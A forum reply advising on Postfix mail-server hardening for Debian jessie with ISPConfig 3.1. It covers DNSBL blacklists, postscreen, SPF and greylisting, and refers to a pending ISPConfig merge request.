    For the most part, yes, that would apply to jessie. Depending on your time frame, ispconfig 3.1 will have better postfix config out of the box. If https://git.ispconfig.org/ispconfig/ispconfig3/merge_requests/279 is accepted, skip the entirety of the 'Postfix main.cf' section in that hardening guide and go with ispconfig defaults. Use the the ispconfig interface to configure the blacklists (DNSBL section). Postscreen is a good tool (if you can use it, eg. if you require all your clients to send on port 587), but the postscreen section there is pretty incomplete, though would work as a first step. The SPF info and greylisting info would apply (though you might skip greylisting if you use postscreen).
     

Share This Page